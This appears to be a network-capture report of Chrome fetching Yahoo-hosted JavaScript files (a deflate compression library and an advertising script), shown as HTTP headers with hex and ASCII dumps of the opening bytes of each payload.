                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 28 Jun 2024 05:42:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 06 Mar 2018 20:46:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "e2202e6ed6ef52cec2c4a875c99225ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-meta-created-date: Wed, 15 Oct 2014 18:48:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-meta-mbst-etag: "YM:1:e64293ae-a913-4bb2-8dd1-87431f3be4230005057a946243f1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-meta-x-ysws-mbst-vtime: 1413398917170161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Sat, 05 Sep 2026 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-meta-x-ysws-access: public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 8163483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 24 49 64 3a 20 72 61 77 64 65 66 6c 61 74 65 2e 6a 73 2c 76 20 30 2e 33 20 32 30 30 39 2f 30 33 2f 30 31 20 31 39 3a 30 35 3a 30 35 20 64 61 6e 6b 6f 67 61 69 20 45 78 70 20 64 61 6e 6b 6f 67 61 69 20 24 0a 20 2a 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 3a 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 69 63 6f 73 2e 63 6f 6d 2f 73 74 61 66 66 2f 69 7a 2f 61 6d 75 73 65 2f 6a 61 76 61 73 63 72 69 70 74 2f 65 78 70 65 72 74 2f 64 65 66 6c 61 74 65 2e 74 78 74 0a 20 2a 2f 0a 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 39 20 4d 61 73 61 6e 61 6f 20 49 7a 75 6d 6f 20 3c 69 7a 40 6f 6e 69 63 6f 73 2e 63 6f 2e 6a 70 3e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /* @preserve * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $ * * Original: * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt *//* @preserve * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp> * Version:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 65 72 72 6f 72 3a 20 7a 69 70 5f 57 53 49 5a 45 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 22 29 2c 5f 3e 64 2d 31 26 26 70 6f 73 74 4d 65 73 73 61 67 65 28 22 65 72 72 6f 72 3a 20 7a 69 70 5f 48 41 53 48 5f 42 49 54 53 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 22 29 2c 28 38 3e 5f 7c 7c 32 35 38 21 3d 68 29 26 26 70 6f 73 74 4d 65 73 73 61 67 65 28 22 65 72 72 6f 72 3a 20 43 6f 64 65 20 74 6f 6f 20 63 6c 65 76 65 72 22 29 3b 76 61 72 20 76 2c 79 2c 77 2c 6d 2c 67 2c 78 2c 62 2c 70 2c 4d 2c 43 2c 42 2c 7a 2c 49 2c 52 2c 58 2c 44 2c 6a 2c 6b 2c 4e 2c 53 2c 48 2c 55 2c 5a 2c 45 2c 46 2c 54 2c 57 2c 71 2c 47 2c 4a 2c 4b 2c 4c 2c 4f 2c 50 2c 51 2c 56 2c 59 2c 24 2c 72 74 2c 74 74 2c 65 74 2c 6e 74 2c 66 74 2c 6f 74 2c 69 74 2c 61 74 2c 6c 74 2c 75 74 2c 73 74 2c 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: error: zip_WSIZE is too large"),_>d-1&&postMessage("error: zip_HASH_BITS is too large"),(8>_||258!=h)&&postMessage("error: Code too clever");var v,y,w,m,g,x,b,p,M,C,B,z,I,R,X,D,j,k,N,S,H,U,Z,E,F,T,W,q,G,J,K,L,O,P,Q,V,Y,$,rt,tt,et,nt,ft,ot,it,at,lt,ut,st,c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 3d 21 31 2c 5a 3d 21 31 2c 6e 75 6c 6c 3d 3d 46 74 29 7b 66 6f 72 28 76 3d 79 3d 77 3d 6e 75 6c 6c 2c 46 74 3d 41 72 72 61 79 28 75 29 2c 70 3d 41 72 72 61 79 28 73 29 2c 4d 3d 41 72 72 61 79 28 77 74 29 2c 43 3d 41 72 72 61 79 28 61 2b 6c 29 2c 42 3d 41 72 72 61 79 28 31 3c 3c 64 29 2c 4a 3d 41 72 72 61 79 28 5a 74 29 2c 74 3d 30 3b 5a 74 3e 74 3b 74 2b 2b 29 4a 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4b 3d 41 72 72 61 79 28 32 2a 6b 74 2b 31 29 2c 74 3d 30 3b 32 2a 6b 74 2b 31 3e 74 3b 74 2b 2b 29 4b 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4c 3d 41 72 72 61 79 28 6a 74 2b 32 29 2c 74 3d 30 3b 6a 74 2b 32 3e 74 3b 74 2b 2b 29 4c 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4f 3d 41 72 72 61 79 28 6b 74 29 2c 74 3d 30 3b 6b 74 3e 74 3b 74 2b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =!1,Z=!1,null==Ft){for(v=y=w=null,Ft=Array(u),p=Array(s),M=Array(wt),C=Array(a+l),B=Array(1<<d),J=Array(Zt),t=0;Zt>t;t++)J[t]=new Tt;for(K=Array(2*kt+1),t=0;2*kt+1>t;t++)K[t]=new Tt;for(L=Array(jt+2),t=0;jt+2>t;t++)L[t]=new Tt;for(O=Array(kt),t=0;kt>t;t++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 5a 3d 21 31 3b 4d 74 3e 45 26 26 21 5a 3b 29 73 65 28 29 3b 66 6f 72 28 58 3d 30 2c 72 3d 30 3b 63 2d 31 3e 72 3b 72 2b 2b 29 58 3d 28 58 3c 3c 45 74 5e 32 35 35 26 70 5b 72 5d 29 26 67 74 7d 2c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 74 2c 65 2c 6e 3d 46 2c 66 3d 48 2c 6f 3d 53 2c 61 3d 48 3e 43 74 3f 48 2d 43 74 3a 62 74 2c 6c 3d 48 2b 68 2c 75 3d 70 5b 66 2b 6f 2d 31 5d 2c 73 3d 70 5b 66 2b 6f 5d 3b 53 3e 3d 71 26 26 28 6e 3e 3e 3d 32 29 3b 64 6f 20 69 66 28 74 3d 72 2c 70 5b 74 2b 6f 5d 3d 3d 73 26 26 70 5b 74 2b 6f 2d 31 5d 3d 3d 75 26 26 70 5b 74 5d 3d 3d 70 5b 66 5d 26 26 70 5b 2b 2b 74 5d 3d 3d 70 5b 66 2b 31 5d 29 7b 66 2b 3d 32 2c 74 2b 2b 3b 64 6f 3b 77 68 69 6c 65 28 70 5b 2b 2b 66 5d 3d 3d 70 5b 2b 2b 74 5d 26 26 70 5b 2b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Z=!1;Mt>E&&!Z;)se();for(X=0,r=0;c-1>r;r++)X=(X<<Et^255&p[r])&gt},ue=function(r){var t,e,n=F,f=H,o=S,a=H>Ct?H-Ct:bt,l=H+h,u=p[f+o-1],s=p[f+o];S>=q&&(n>>=2);do if(t=r,p[t+o]==s&&p[t+o-1]==u&&p[t]==p[f]&&p[++t]==p[f+1]){f+=2,t++;do;while(p[++f]==p[++t]&&p[++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 5a 7c 7c 28 7a 3d 30 2c 49 3d 30 2c 76 65 28 29 2c 6c 65 28 29 2c 79 3d 6e 75 6c 6c 2c 67 3d 30 2c 78 3d 30 2c 6b 3d 30 2c 33 3e 3d 57 3f 28 53 3d 63 2d 31 2c 4e 3d 30 29 3a 28 4e 3d 63 2d 31 2c 6b 3d 30 2c 6b 3d 30 29 2c 62 3d 21 31 29 7d 2c 41 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 6d 7c 7c 28 64 65 28 29 2c 6d 3d 21 30 2c 30 21 3d 45 29 3f 28 6e 3d 5f 65 28 72 2c 74 2c 65 29 29 3d 3d 65 3f 65 3a 62 3f 6e 3a 28 33 3e 3d 57 3f 63 65 28 29 3a 68 65 28 29 2c 30 3d 3d 45 26 26 28 30 21 3d 6b 26 26 7a 65 28 30 2c 32 35 35 26 70 5b 48 2d 31 5d 29 2c 42 65 28 31 29 2c 62 3d 21 30 29 2c 6e 2b 5f 65 28 72 2c 6e 2b 74 2c 65 2d 6e 29 29 3a 28 62 3d 21 30 2c 30 29 7d 2c 5f 65 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: function(){Z||(z=0,I=0,ve(),le(),y=null,g=0,x=0,k=0,3>=W?(S=c-1,N=0):(N=c-1,k=0,k=0),b=!1)},Ae=function(r,t,e){var n;return m||(de(),m=!0,0!=E)?(n=_e(r,t,e))==e?e:b?n:(3>=W?ce():he(),0==E&&(0!=k&&ze(0,255&p[H-1]),Be(1),b=!0),n+_e(r,n+t,e-n)):(b=!0,0)},_e=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 44 65 28 72 2c 35 29 3b 79 65 28 29 7d 7d 2c 79 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 30 3b 6a 74 3e 72 3b 72 2b 2b 29 4a 5b 72 5d 2e 66 63 3d 30 3b 66 6f 72 28 72 3d 30 3b 6b 74 3e 72 3b 72 2b 2b 29 4b 5b 72 5d 2e 66 63 3d 30 3b 66 6f 72 28 72 3d 30 3b 4e 74 3e 72 3b 72 2b 2b 29 50 5b 72 5d 2e 66 63 3d 30 3b 4a 5b 44 74 5d 2e 66 63 3d 31 2c 41 74 3d 5f 74 3d 30 2c 75 74 3d 73 74 3d 63 74 3d 30 2c 68 74 3d 30 2c 64 74 3d 31 7d 2c 77 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 72 74 5b 74 5d 2c 6e 3d 74 3c 3c 31 3b 74 74 3e 3d 6e 26 26 28 74 74 3e 6e 26 26 69 65 28 72 2c 72 74 5b 6e 2b 31 5d 2c 72 74 5b 6e 5d 29 26 26 6e 2b 2b 2c 21 69 65 28 72 2c 65 2c 72 74 5b 6e 5d 29 29 3b 29 72 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: De(r,5);ye()}},ye=function(){var r;for(r=0;jt>r;r++)J[r].fc=0;for(r=0;kt>r;r++)K[r].fc=0;for(r=0;Nt>r;r++)P[r].fc=0;J[Dt].fc=1,At=_t=0,ut=st=ct=0,ht=0,dt=1},we=function(r,t){for(var e=rt[t],n=t<<1;tt>=n&&(tt>n&&ie(r,rt[n+1],rt[n])&&n++,!ie(r,e,rt[n]));)rt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 74 5b 65 5d 2b 31 3f 6e 74 5b 74 5d 3a 6e 74 5b 65 5d 2b 31 2c 6e 5b 74 5d 2e 64 6c 3d 6e 5b 65 5d 2e 64 6c 3d 61 2c 72 74 5b 42 74 5d 3d 61 2b 2b 2c 77 65 28 6e 2c 42 74 29 3b 77 68 69 6c 65 28 74 74 3e 3d 32 29 3b 72 74 5b 2d 2d 65 74 5d 3d 72 74 5b 42 74 5d 2c 6d 65 28 72 29 2c 67 65 28 6e 2c 69 29 7d 2c 62 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 76 61 72 20 65 2c 6e 2c 66 3d 2d 31 2c 6f 3d 72 5b 30 5d 2e 64 6c 2c 69 3d 30 2c 61 3d 37 2c 6c 3d 34 3b 66 6f 72 28 30 3d 3d 6f 26 26 28 61 3d 31 33 38 2c 6c 3d 33 29 2c 72 5b 74 2b 31 5d 2e 64 6c 3d 36 35 35 33 35 2c 65 3d 30 3b 74 3e 3d 65 3b 65 2b 2b 29 6e 3d 6f 2c 6f 3d 72 5b 65 2b 31 5d 2e 64 6c 2c 61 3e 2b 2b 69 26 26 6e 3d 3d 6f 7c 7c 28 6c 3e 69 3f 50 5b 6e 5d 2e 66 63 2b 3d 69 3a 30 21 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t[e]+1?nt[t]:nt[e]+1,n[t].dl=n[e].dl=a,rt[Bt]=a++,we(n,Bt);while(tt>=2);rt[--et]=rt[Bt],me(r),ge(n,i)},be=function(r,t){var e,n,f=-1,o=r[0].dl,i=0,a=7,l=4;for(0==o&&(a=138,l=3),r[t+1].dl=65535,e=0;t>=e;e++)n=o,o=r[e+1].dl,a>++i&&n==o||(l>i?P[n].fc+=i:0!=n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 29 2c 64 74 3c 3c 3d 31 2c 30 3d 3d 28 37 26 75 74 29 26 26 28 6c 74 5b 63 74 2b 2b 5d 3d 68 74 2c 68 74 3d 30 2c 64 74 3d 31 29 2c 57 3e 32 26 26 30 3d 3d 28 34 30 39 35 26 75 74 29 29 7b 76 61 72 20 65 2c 6e 3d 38 2a 75 74 2c 66 3d 48 2d 52 3b 66 6f 72 28 65 3d 30 3b 6b 74 3e 65 3b 65 2b 2b 29 6e 2b 3d 4b 5b 65 5d 2e 66 63 2a 28 35 2b 4b 74 5b 65 5d 29 3b 69 66 28 6e 3e 3e 3d 33 2c 70 61 72 73 65 49 6e 74 28 75 74 2f 32 29 3e 73 74 26 26 70 61 72 73 65 49 6e 74 28 66 2f 32 29 3e 6e 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 20 75 74 3d 3d 41 2d 31 7c 7c 73 74 3d 3d 77 74 7d 2c 49 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 76 61 72 20 65 2c 6e 2c 66 2c 6f 2c 69 3d 30 2c 61 3d 30 2c 6c 3d 30 2c 75 3d 30 3b 69 66 28 30 21 3d 75 74 29 64 6f 20 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ),dt<<=1,0==(7&ut)&&(lt[ct++]=ht,ht=0,dt=1),W>2&&0==(4095&ut)){var e,n=8*ut,f=H-R;for(e=0;kt>e;e++)n+=K[e].fc*(5+Kt[e]);if(n>>=3,parseInt(ut/2)>st&&parseInt(f/2)>n)return!0}return ut==A-1||st==wt},Ie=function(r,t){var e,n,f,o,i=0,a=0,l=0,u=0;if(0!=ut)do 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 4d 3d 41 72 72 61 79 28 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 2c 31 2c 31 2c 31 2c 32 2c 32 2c 32 2c 32 2c 33 2c 33 2c 33 2c 33 2c 34 2c 34 2c 34 2c 34 2c 35 2c 35 2c 35 2c 35 2c 30 2c 39 39 2c 39 39 29 2c 43 3d 41 72 72 61 79 28 31 2c 32 2c 33 2c 34 2c 35 2c 37 2c 39 2c 31 33 2c 31 37 2c 32 35 2c 33 33 2c 34 39 2c 36 35 2c 39 37 2c 31 32 39 2c 31 39 33 2c 32 35 37 2c 33 38 35 2c 35 31 33 2c 37 36 39 2c 31 30 32 35 2c 31 35 33 37 2c 32 30 34 39 2c 33 30 37 33 2c 34 30 39 37 2c 36 31 34 35 2c 38 31 39 33 2c 31 32 32 38 39 2c 31 36 33 38 35 2c 32 34 35 37 37 29 2c 42 3d 41 72 72 61 79 28 30 2c 30 2c 30 2c 30 2c 31 2c 31 2c 32 2c 32 2c 33 2c 33 2c 34 2c 34 2c 35 2c 35 2c 36 2c 36 2c 37 2c 37 2c 38 2c 38 2c 39 2c 39 2c 31 30 2c 31 30 2c 31 31 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M=Array(0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,99,99),C=Array(1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577),B=Array(0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    81192.168.2.44984287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC533OUTGET /aaq/benji/benji-2.1.123.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: UfhuNLOBOG1Pu3ILa8GJs2AG6WdYGgyde0iP3W+VmeVrgjYpktOYuZPM2QQqvgIdhy2JTmy9y/k=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 7EGJ1EXAXM3J5SQH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 29 Sep 2024 21:06:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Sep 2024 21:31:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "66b2b6a7e55444cdb9d1f4906bc9e6d1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: RyskklpfTINJYOWq9gsSQpDwOWWSaT7k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 87389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 72890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 7b 61 73 73 65 72 74 69 76 65 3a 7b 7d 2c 62 65 6e 6a 69 3a 7b 7d 2c 67 6f 6f 67 6c 65 74 61 67 3a 7b 63 6d 64 3a 5b 5d 7d 2c 70 62 6a 73 3a 7b 71 75 65 3a 5b 5d 7d 2c 59 41 48 4f 4f 3a 7b 7d 7d 3b 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 3d 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 7c 7c 28 65 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 65 2e 6d 61 70 28 28 65 3d 3e 65 2e 74 68 65 6e 28 28 65 3d 3e 28 7b 73 74 61 74 75 73 3a 22 66 75 6c 66 69 6c 6c 65 64 22 2c 76 61 6c 75 65 3a 65 7d 29 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 28 7b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 31 33 33 31 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 31 36 2c 33 5d 2c 22 34 38 31 2c 31 33 33 30 22 3a 5b 34 30 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 31 5d 7d 2c 4c 69 67 68 74 68 6f 75 73 65 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 39 2c 31 36 5d 7d 2c 73 69 7a 65 3a 5b 32 2c 32 5d 7d 2c 53 6d 61 72 74 41 73 73 65 74 57 69 64 67 65 74 4c 61 72 67 65 3a 7b 73 69 7a 65 3a 5b 38 30 30 2c 36 33 35 5d 7d 2c 53 70 6f 74 6c 69 67 68 74 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 34 38 30 22 3a 5b 38 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 32 5d 7d 2c 54 72 61 64 65 4e 6f 77 3a 7b 73 69 7a 65 3a 5b 32 38 30 2c 35 35 5d 7d 7d 2c 6b 3d 7b 22 5b 31 34 34 30 2c 31 30 32 34 5d 22 3a 22 4c 6f 67 69 6e 22 2c 22 5b 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1331,Infinity":[16,3],"481,1330":[40,9]},size:[3,1]},Lighthouse:{breakpoints:{"0,Infinity":[9,16]},size:[2,2]},SmartAssetWidgetLarge:{size:[800,635]},Spotlight:{breakpoints:{"0,480":[8,9]},size:[3,2]},TradeNow:{size:[280,55]}},k={"[1440,1024]":"Login","[2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 7d 2c 51 3d 7b 63 6c 69 63 6b 3a 22 63 6c 69 63 6b 22 2c 6e 6f 63 6f 6e 74 65 6e 74 3a 22 6e 6f 63 6f 6e 74 65 6e 74 22 2c 72 65 6e 64 65 72 3a 22 72 65 6e 64 65 72 22 7d 2c 4a 3d 22 61 75 63 74 69 6f 6e 49 6e 69 74 22 2c 4b 3d 22 62 69 64 57 6f 6e 22 2c 58 3d 7b 65 30 3a 22 2d 65 30 22 2c 65 31 3a 22 2d 65 31 22 2c 45 49 44 53 5f 55 52 4c 3a 22 69 64 78 2e 6c 69 61 64 6d 2e 63 6f 6d 22 2c 48 42 5f 55 49 5f 4d 4f 44 3a 22 68 62 5f 75 69 64 5f 6d 6f 64 22 2c 4c 49 5f 4f 46 46 3a 22 6c 69 76 65 49 6e 74 65 6e 74 49 64 5f 6f 66 66 22 2c 4c 49 5f 4f 4e 5f 45 4e 52 49 43 48 45 44 3a 22 6c 69 76 65 69 6e 74 65 6e 74 69 64 5f 6f 6e 5f 65 6e 72 69 63 68 65 64 22 2c 4c 49 5f 4f 4e 5f 4e 4f 54 5f 45 4e 52 49 43 48 45 44 3a 22 6c 69 76 65 69 6e 74 65 6e 74 69 64 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },Q={click:"click",nocontent:"nocontent",render:"render"},J="auctionInit",K="bidWon",X={e0:"-e0",e1:"-e1",EIDS_URL:"idx.liadm.com",HB_UI_MOD:"hb_uid_mod",LI_OFF:"liveIntentId_off",LI_ON_ENRICHED:"liveintentid_on_enriched",LI_ON_NOT_ENRICHED:"liveintentid_
